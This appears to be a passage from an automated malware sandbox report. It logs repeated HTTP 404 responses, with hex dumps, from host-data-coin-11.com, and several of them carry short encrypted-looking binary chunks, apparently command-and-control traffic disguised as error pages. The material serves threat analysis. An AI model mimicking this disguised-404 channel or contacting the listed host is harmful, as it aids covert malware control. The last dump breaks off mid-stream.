                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OI:J_J-WS,/0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 ec aa 8c 70 bc 57 dd 43 de ff 21 81 22 e6 c3 95 50 28 e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9GpWC!"P(c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OR%@_M-\z.TKC0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 38 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 eb 98 bd a5 1d b7 51 d8 6d a5 1b 46 9b 10 bc be 71 b0 64 56 11 b1 b6 d8 40 fa 0f 85 1d 87 aa 64 9a 66 b0 f3 ce 13 6b b7 e4 4b 35 a9 f2 e0 0d 0a 30 0d 0a 0d 0a Data Ascii: 48I:82OOjQmFqdV@dfkK50
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OO~kEKg2P0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 14 Jan 2022 11:27:59 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OR&:UPJ$dP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 